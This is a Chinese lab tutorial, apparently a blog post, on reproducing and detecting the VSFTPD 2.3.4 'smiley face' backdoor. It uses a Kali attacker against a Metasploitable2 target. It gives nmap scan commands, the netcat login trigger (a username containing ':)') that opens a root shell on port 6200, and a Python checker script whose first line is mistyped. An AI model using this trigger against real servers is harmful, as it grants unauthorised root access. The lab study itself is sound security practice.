Python脚本检测与复现笑脸漏洞

笑脸漏洞(VSFTPD2.3.4)

在VSFTPD2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令

攻击机:kali
靶机: Metasploitable2-Linux,这是一个集成了很多漏洞的平台

复现过程

首先打开kali root模式,输入ipconfig查看自己的ip

然后输入

nmap 192.168.219.0/24

nmap扫描同网段的靶机,观察靶机上的服务开放情况 

使用nmap扫描运行的服务的版本信息

nmap -sV 192.168.219.129

可以看到21端口版本是VSFTPD2.3.4

之后利用netcat,连接靶机的21端口,输入user带有:),pass随便输入。
例如:user a:) pass 123456

 用nmap扫描6200端口  ,观察端口打开情况

6200端口已经open
用nc连接6200端口,成功以root身份登入,漏洞复现完毕

漏洞检测

在 Kali 中新建文本文档,写入 Python 脚本代码,命名为smile.py
mport socket
from ftplib import FTP
 
url = input("输入检测地址:")
ftp = FTP()
username = 'user:)'
password = '123456'
try:
    ftp.connect(url, 21, timeout=1)
    ftp.login(username, password)
    ftp.quit()
except:
    print("完成登录检测")
try:
    s = socket.socket()
    s.connect((url, 6200))
    s.close()
    print("存在笑脸漏洞")
except:
    print("不存在笑脸漏洞")

由于之前我们已经开放6200端口,所以直接在桌面打开命令行,输入

python +(文件名)

监测完成

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值